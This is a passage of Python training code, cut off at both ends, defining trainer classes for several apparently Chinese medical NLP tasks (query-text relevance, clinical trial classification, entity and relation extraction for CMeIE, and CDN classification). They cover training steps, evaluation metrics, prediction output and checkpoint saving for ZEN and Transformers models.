self.tokenizer.save_vocabulary(save_directory=self.args.output_dir)
self.logger.info('Saving models checkpoint to %s', self.args.output_dir)
class QTRTrainer(Trainer):
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(QTRTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
text1 = item[0]
text2 = item[1]
labels = item[2].to(self.args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
# default using 'Transformers' library models.
outputs = model(labels=labels, **inputs)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
labels = item[2].to(args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(labels=labels, **inputs)
loss, logits = outputs[:2]
if preds is None:
preds = logits.detach().cpu().numpy()
eval_labels = labels.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, labels.detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
acc = qtr_metric(preds, eval_labels)
logger.info("%s-%s acc: %s", args.task_name, args.model_name, acc)
return acc
def predict(self, test_dataset, model):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
preds = None
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Prediction')
for step, item in enumerate(test_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(**inputs)
if self.args.model_type == 'zen':
logits = outputs
else:
logits = outputs[0]
if preds is None:
preds = logits.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
pbar(step=step, info="")
preds = np.argmax(preds, axis=1)
qtr_commit_prediction(dataset=test_dataset, preds=preds, output_dir=args.result_output_dir,
id2label=self.data_processor.id2label)
return preds
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=output_dir)
self.logger.info('Saving models checkpoint to %s', output_dir)
def _save_best_checkpoint(self, best_step):
model = self.model_class.from_pretrained(os.path.join(self.args.output_dir, f'checkpoint-{best_step}'),
num_labels=self.data_processor.num_labels)
if self.args.model_type == 'zen':
save_zen_model(self.args.output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(self.args.output_dir)
torch.save(self.args, os.path.join(self.args.output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=self.args.output_dir)
self.logger.info('Saving models checkpoint to %s', self.args.output_dir)
class CTCTrainer(Trainer):
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(CTCTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
input_ids = item[0].to(self.args.device)
token_type_ids = item[1].to(self.args.device)
attention_mask = item[2].to(self.args.device)
labels = item[3].to(self.args.device)
if self.args.model_type == 'zen':
input_ngram_ids = item[4].to(self.args.device)
ngram_attention_mask = item[5].to(self.args.device)
ngram_token_type_ids = item[6].to(self.args.device)
ngram_position_matrix = item[7].to(self.args.device)
# default using 'Transformers' library models.
if self.args.model_type == 'zen':
outputs = model(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids,
labels=labels, ngram_ids=input_ngram_ids, ngram_positions=ngram_position_matrix,
ngram_attention_mask=ngram_attention_mask, ngram_token_type_ids=ngram_token_type_ids)
else:
outputs = model(labels=labels, input_ids=input_ids, token_type_ids=token_type_ids,
attention_mask=attention_mask)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
input_ids = item[0].to(self.args.device)
token_type_ids = item[1].to(self.args.device)
attention_mask = item[2].to(self.args.device)
labels = item[3].to(self.args.device)
if args.model_type == 'zen':
input_ngram_ids = item[4].to(self.args.device)
ngram_attention_mask = item[5].to(self.args.device)
ngram_token_type_ids = item[6].to(self.args.device)
ngram_position_matrix = item[7].to(self.args.device)
with torch.no_grad():
if self.args.model_type == 'zen':
outputs = model(input_ids=input_ids, token_type_ids=token_type_ids, attention_mask=attention_mask,
labels=labels, ngram_ids=input_ngram_ids,
ngram_positions=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids,
ngram_attention_mask=ngram_attention_mask)
else:
outputs = model(labels=labels, input_ids=input_ids, token_type_ids=token_type_ids,
attention_mask=attention_mask)
loss, logits = outputs[:2]
if preds is None:
preds = logits.detach().cpu().numpy()
eval_labels = labels.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, labels.detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
p, r, f1, _ = ctc_metric(preds, eval_labels)
logger.info("%s-%s precision: %s - recall: %s - f1 score: %s", args.task_name, args.model_name, p, r, f1)
return f1
def predict(self, test_dataset, model):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
preds = None
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Prediction')
for step, item in enumerate(test_dataloader):
model.eval()
input_ids = item[0].to(self.args.device)
token_type_ids = item[1].to(self.args.device)
attention_mask = item[2].to(self.args.device)
if args.model_type == 'zen':
input_ngram_ids = item[3].to(self.args.device)
ngram_attention_mask = item[4].to(self.args.device)
ngram_token_type_ids = item[5].to(self.args.device)
ngram_position_matrix = item[6].to(self.args.device)
with torch.no_grad():
if self.args.model_type == 'zen':
outputs = model(input_ids=input_ids, token_type_ids=token_type_ids, attention_mask=attention_mask,
ngram_ids=input_ngram_ids,
ngram_positions=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids,
ngram_attention_mask=ngram_attention_mask)
else:
outputs = model(input_ids=input_ids, token_type_ids=token_type_ids,
attention_mask=attention_mask)
if args.model_type == 'zen':
logits = outputs.detach()
else:
logits = outputs[0].detach()
if preds is None:
preds = logits.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
pbar(step=step, info="")
preds = np.argmax(preds, axis=1)
ctc_commit_prediction(dataset=test_dataset, preds=preds, output_dir=args.result_output_dir,
id2label=self.data_processor.id2label)
return preds
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=output_dir)
self.logger.info('Saving models checkpoint to %s', output_dir)
def _save_best_checkpoint(self, best_step):
model = self.model_class.from_pretrained(os.path.join(self.args.output_dir, f'checkpoint-{best_step}'),
num_labels=self.data_processor.num_labels)
if self.args.model_type == 'zen':
save_zen_model(self.args.output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(self.args.output_dir)
torch.save(self.args, os.path.join(self.args.output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=self.args.output_dir)
self.logger.info('Saving models checkpoint to %s', self.args.output_dir)
class ERTrainer(Trainer):
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(ERTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
self.loss_fn = nn.BCELoss()
def training_step(self, model, item):
model.train()
if self.args.model_type == 'zen':
input_ids, token_type_ids, attention_mask, sub_start_label, sub_end_label, obj_start_label, \
obj_end_label, input_ngram_ids, ngram_attention_mask, ngram_token_type_ids, ngram_position_matrix = item
else:
input_ids, token_type_ids, attention_mask, sub_start_label, sub_end_label, obj_start_label, obj_end_label = item
input_ids = input_ids.to(self.args.device)
token_type_ids = token_type_ids.to(self.args.device)
attention_mask = attention_mask.to(self.args.device)
sub_start_label = sub_start_label.to(self.args.device)
sub_end_label = sub_end_label.to(self.args.device)
obj_start_label = obj_start_label.to(self.args.device)
obj_end_label = obj_end_label.to(self.args.device)
if self.args.model_type == 'zen':
input_ngram_ids = input_ngram_ids.to(self.args.device)
ngram_token_type_ids = ngram_token_type_ids.to(self.args.device)
ngram_attention_mask = ngram_attention_mask.to(self.args.device)
ngram_position_matrix = ngram_position_matrix.to(self.args.device)
if self.args.model_type == 'zen':
sub_start_logits, sub_end_logits, obj_start_logits, obj_end_logits = model(input_ids, token_type_ids,
attention_mask,
input_ngram_ids=input_ngram_ids,
ngram_attention_mask=ngram_attention_mask,
ngram_position_matrix=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids)
else:
sub_start_logits, sub_end_logits, obj_start_logits, obj_end_logits = model(input_ids,
token_type_ids,
attention_mask)
active_index = attention_mask.view(-1) == 1
sub_start_loss = self.cal_loss(sub_start_logits, sub_start_label, active_index)
sub_end_loss = self.cal_loss(sub_end_logits, sub_end_label, active_index)
obj_start_loss = self.cal_loss(obj_start_logits, obj_start_label, active_index)
obj_end_loss = self.cal_loss(obj_end_logits, obj_end_label, active_index)
loss = sub_start_loss + sub_end_loss + obj_start_loss + obj_end_loss
loss.backward()
return loss.detach()
def cal_loss(self, logits, labels, active_index):
active_labels = labels.view(-1)[active_index]
active_logits = logits.view(-1)[active_index]
return self.loss_fn(active_logits.float()[1:-1], active_labels.float()[1:-1])
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
sub_start_preds = []
sub_end_preds = []
obj_start_preds = []
obj_end_preds = []
sub_start_trues = []
sub_end_trues = []
obj_start_trues = []
obj_end_trues = []
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
if self.args.model_type == 'zen':
input_ids, token_type_ids, attention_mask, sub_start_label, sub_end_label, obj_start_label, \
obj_end_label, input_ngram_ids, ngram_attention_mask, ngram_token_type_ids, ngram_position_matrix = item
else:
input_ids, token_type_ids, attention_mask, sub_start_label, sub_end_label, obj_start_label, obj_end_label = item
input_ids = input_ids.to(self.args.device)
token_type_ids = token_type_ids.to(self.args.device)
attention_mask = attention_mask.to(self.args.device)
sub_start_label = sub_start_label.to(self.args.device)
sub_end_label = sub_end_label.to(self.args.device)
obj_start_label = obj_start_label.to(self.args.device)
obj_end_label = obj_end_label.to(self.args.device)
if self.args.model_type == 'zen':
input_ngram_ids = input_ngram_ids.to(self.args.device)
ngram_token_type_ids = ngram_token_type_ids.to(self.args.device)
ngram_attention_mask = ngram_attention_mask.to(self.args.device)
ngram_position_matrix = ngram_position_matrix.to(self.args.device)
with torch.no_grad():
if args.model_type == 'zen':
sub_start_logits, sub_end_logits, obj_start_logits, obj_end_logits = model(input_ids,
token_type_ids,
attention_mask,
input_ngram_ids=input_ngram_ids,
ngram_attention_mask=ngram_attention_mask,
ngram_position_matrix=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids)
else:
sub_start_logits, sub_end_logits, obj_start_logits, obj_end_logits = model(input_ids,
token_type_ids,
attention_mask)
active_index = attention_mask.view(-1) == 1
sub_start_preds.extend((sub_start_logits.detach().view(-1) >= 0.5).cpu().long()[active_index])
sub_end_preds.extend((sub_end_logits.detach().view(-1) >= 0.5).cpu().long()[active_index])
obj_start_preds.extend((obj_start_logits.detach().view(-1) >= 0.5).cpu().long()[active_index])
obj_end_preds.extend((obj_end_logits.detach().view(-1) >= 0.5).cpu()[active_index])
sub_start_trues.extend(sub_start_label.detach().cpu().view(-1)[active_index].tolist())
sub_end_trues.extend(sub_end_label.detach().cpu().view(-1)[active_index].tolist())
obj_start_trues.extend(obj_start_label.detach().cpu().view(-1)[active_index].tolist())
obj_end_trues.extend(obj_end_label.detach().cpu().view(-1)[active_index].tolist())
s_start_p, s_start_r, s_start_f1, _ = er_metric(sub_start_preds, sub_start_trues)
s_end_p, s_end_r, s_end_f1, _ = er_metric(sub_end_preds, sub_end_trues)
o_start_p, o_start_r, o_start_f1, _ = er_metric(obj_start_preds, obj_start_trues)
o_end_p, o_end_r, o_end_f1, _ = er_metric(obj_end_preds, obj_end_trues)
f1 = (s_start_f1 + s_end_f1 + o_end_f1 + o_start_f1) / 4
logger.info("%s-%s f1 score: %s", args.task_name, args.model_name, f1)
return f1
def predict(self, test_dataset, model):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset, batch_size=1)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
with open(os.path.join(args.output_dir, 'CMeIE_test.json'), 'w', encoding='utf-8') as f:
for step, item in enumerate(test_dataloader):
model.eval()
if args.model_type == 'zen':
input_ids, token_type_ids, attention_mask, input_ngram_ids, ngram_attention_mask, ngram_token_type_ids, ngram_position_matrix = item
else:
input_ids, token_type_ids, attention_mask = item
input_ids = input_ids.to(self.args.device)
token_type_ids = token_type_ids.to(self.args.device)
attention_mask = attention_mask.to(self.args.device)
if self.args.model_type == 'zen':
input_ngram_ids = input_ngram_ids.to(self.args.device)
ngram_token_type_ids = ngram_token_type_ids.to(self.args.device)
ngram_attention_mask = ngram_attention_mask.to(self.args.device)
ngram_position_matrix = ngram_position_matrix.to(self.args.device)
with torch.no_grad():
if args.model_type == 'zen':
sub_start_logits, sub_end_logits, obj_start_logits, obj_end_logits = model(input_ids, token_type_ids,
attention_mask,
input_ngram_ids=input_ngram_ids,
ngram_attention_mask=ngram_attention_mask,
ngram_position_matrix=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids)
else:
sub_start_logits, sub_end_logits, obj_start_logits, obj_end_logits = model(input_ids,
token_type_ids,
attention_mask)
text = test_dataset.texts[step]
text_start_id, text_end_id = 1, attention_mask.sum().int().item() # end+1
text_mapping = TokenRematch().rematch(text, self.tokenizer.tokenize(text))
sub_arg_list = self.data_processor.extract_arg(sub_start_logits.view(-1), sub_end_logits.view(-1), text_start_id, text_end_id,
text, text_mapping)
obj_arg_list = self.data_processor.extract_arg(obj_start_logits.view(-1), obj_end_logits.view(-1), text_start_id, text_end_id,
text, text_mapping)
result = {'text': text, 'sub_list': sub_arg_list, 'obj_list': obj_arg_list}
json_data = json.dumps(result, ensure_ascii=False)
f.write(json_data + '\n')
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
torch.save(model.state_dict(), os.path.join(output_dir, 'pytorch_model.pt'))
self.logger.info('Saving models checkpoint to %s', output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model.encoder, self.tokenizer, self.ngram_dict, self.args)
else:
model.encoder.save_pretrained(output_dir)
self.tokenizer.save_vocabulary(save_directory=output_dir)
def _save_best_checkpoint(self, best_step):
pass
class RETrainer(Trainer):
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(RETrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
if self.args.model_type == 'zen':
input_ids, token_type_ids, attention_mask, flag, label, input_ngram_ids, \
ngram_attention_mask, ngram_token_type_ids, ngram_position_matrix = item
else:
input_ids, token_type_ids, attention_mask, flag, label = item
input_ids, token_type_ids, attention_mask, flag, label = input_ids.to(self.args.device), \
token_type_ids.to(self.args.device), \
attention_mask.to(self.args.device), \
flag.to(self.args.device), label.to(self.args.device)
if self.args.model_type == 'zen':
input_ngram_ids = input_ngram_ids.to(self.args.device)
ngram_position_matrix = ngram_position_matrix.to(self.args.device)
ngram_attention_mask = ngram_attention_mask.to(self.args.device)
ngram_token_type_ids = ngram_token_type_ids.to(self.args.device)
loss, logits = model(input_ids, token_type_ids, attention_mask, flag, label,
input_ngram_ids=input_ngram_ids, ngram_attention_mask=ngram_attention_mask,
ngram_position_matrix=ngram_position_matrix, ngram_token_type_ids=ngram_token_type_ids)
else:
loss, logits = model(input_ids, token_type_ids, attention_mask, flag, label)
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
if self.args.model_type == 'zen':
input_ids, token_type_ids, attention_mask, flag, label, input_ngram_ids, \
ngram_attention_mask, ngram_token_type_ids, ngram_position_matrix = item
else:
input_ids, token_type_ids, attention_mask, flag, label = item
input_ids, token_type_ids, attention_mask, flag, label = input_ids.to(self.args.device), \
token_type_ids.to(self.args.device), \
attention_mask.to(self.args.device), \
flag.to(self.args.device), label.to(self.args.device)
with torch.no_grad():
if self.args.model_type == 'zen':
input_ngram_ids = input_ngram_ids.to(self.args.device)
ngram_position_matrix = ngram_position_matrix.to(self.args.device)
ngram_attention_mask = ngram_attention_mask.to(self.args.device)
ngram_token_type_ids = ngram_token_type_ids.to(self.args.device)
loss, logits = model(input_ids, token_type_ids, attention_mask, flag, label,
input_ngram_ids=input_ngram_ids, ngram_attention_mask=ngram_attention_mask,
ngram_position_matrix=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids)
else:
loss, logits = model(input_ids, token_type_ids, attention_mask, flag, label)
if preds is None:
preds = logits.detach().cpu().numpy()
eval_labels = label.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, label.detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
p, r, f1, _ = re_metric(preds, eval_labels)
logger.info("%s-%s precision: %s - recall: %s - f1 score: %s", args.task_name, args.model_name, p, r, f1)
return f1
def predict(self, test_samples, model, re_dataset_class):
args = self.args
logger = self.logger
model.to(args.device)
logger.info("***** Running prediction *****")
with open(os.path.join(args.result_output_dir, 'CMeIE_test.json'), 'w',
encoding="utf-8") as f:
for data in test_samples:
results, outputs = self.data_processor.build_text(data)
spo_list = [re['spo_list'] for re in results]
temp_re_dataset = re_dataset_class(outputs, data_processor=self.data_processor,
tokenizer=self.tokenizer, max_length=args.max_length, mode="test",
model_type=args.model_type, ngram_dict=self.ngram_dict)
logits = []
with torch.no_grad():
for item in temp_re_dataset:
if self.args.model_type == 'zen':
input_ids, token_type_ids, attention_mask, flag, input_ngram_ids, ngram_attention_mask, ngram_token_type_ids, ngram_position_matrix = item
else:
input_ids, token_type_ids, attention_mask, flag = item
input_ids, token_type_ids, attention_mask, flag = input_ids.to(args.device), \
token_type_ids.to(args.device), \
attention_mask.to(args.device), \
flag.to(args.device)
if args.model_type == 'zen':
input_ngram_ids = input_ngram_ids.to(self.args.device)
ngram_position_matrix = ngram_position_matrix.to(self.args.device)
ngram_attention_mask = ngram_attention_mask.to(self.args.device)
ngram_token_type_ids = ngram_token_type_ids.to(self.args.device)
ngram_max_length = self.ngram_dict.max_ngram_in_seq
logit = model(input_ids=input_ids.view(1, -1), token_type_ids=token_type_ids.view(1, -1),
attention_mask=attention_mask.view(1, -1), flag=flag.view(1, -1),
input_ngram_ids=input_ngram_ids.view(1, -1), ngram_token_type_ids=ngram_token_type_ids.view(1, -1),
ngram_attention_mask=ngram_attention_mask.view(1, -1),
ngram_position_matrix=ngram_position_matrix.view(1, ngram_max_length, ngram_max_length))
else:
logit = model(input_ids=input_ids.view(1, -1), token_type_ids=token_type_ids.view(1, -1),
attention_mask=attention_mask.view(1, -1),
flag=flag.view(1, -1)) # batch, labels
logit = logit.argmax(dim=-1).squeeze(-1) # batch,
logits.append(logit.detach().cpu().item())
for i in range(len(temp_re_dataset)):
if logits[i] > 0:
spo_list[i]['predicate'] = self.data_processor.id2predicate[logits[i]]
new_spo_list = []
for spo in spo_list:
if 'predicate' in spo.keys():
combined = True
for text in data['text'].split("。"):
if spo['object'] in text and spo['subject'] in text:
combined = False
break
tmp = {}
tmp['Combined'] = combined
tmp['predicate'] = spo['predicate'].split('|')[0]
tmp['subject'] = spo['subject']
tmp['subject_type'] = self.data_processor.pre_sub_obj[spo['predicate']][0]
tmp['object'] = {'@value': spo['object']}
tmp['object_type'] = {'@value': self.data_processor.pre_sub_obj[spo['predicate']][1]}
new_spo_list.append(tmp)
new_spo_list2 = [] # 去重
for s in new_spo_list:
if s not in new_spo_list2:
new_spo_list2.append(s)
for i in range(len(new_spo_list2)):
if 'object' not in new_spo_list2[i].keys():
del new_spo_list2[i]
tmp_result = dict()
tmp_result['text'] = data['text']
tmp_result['spo_list'] = new_spo_list2
json_data = json.dumps(tmp_result, ensure_ascii=False)
f.write(json_data + '\n')
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
torch.save(model.state_dict(), os.path.join(output_dir, 'pytorch_model.pt'))
self.logger.info('Saving models checkpoint to %s', output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model.encoder, self.tokenizer, self.ngram_dict, self.args)
else:
model.encoder.save_pretrained(output_dir)
self.tokenizer.save_vocabulary(save_directory=output_dir)
def _save_best_checkpoint(self, best_step):
pass
class CDNForCLSTrainer(Trainer):
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
recall_orig_eval_samples=None,
recall_orig_eval_samples_scores=None,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(CDNForCLSTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
self.recall_orig_eval_samples = recall_orig_eval_samples
self.recall_orig_eval_samples_scores = recall_orig_eval_samples_scores
def training_step(self, model, item):
model.train()
text1 = item[0]
text2 = item[1]
labels = item[2].to(self.args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
outputs = model(labels=labels, **inputs)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(eval_dataloader), desc='Evaluation')
for step, item in enumerate(eval_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
label = item[2].to(args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(**inputs)
logits = outputs
if preds is None:
preds = logits.detach().cpu().numpy()
labels = label.cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu(), axis=0)
labels = np.append(labels, label.detach().cpu().numpy(), axis=0)
pbar(step, info="")
preds = np.argmax(preds, axis=1)
p, r, f1, _ = cdn_cls_metric(preds, labels)
logger.info("%s-%s precision: %s - recall: %s - f1 score: %s", args.task_name, args.model_name, p, r, f1)
return f1
def predict(self, test_dataset, model):
args = self.args
logger = self.logger
test_dataset.text1 = test_dataset.text1
test_dataset.text2 = test_dataset.text2
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
preds = None
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Evaluation')
for step, item in enumerate(test_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
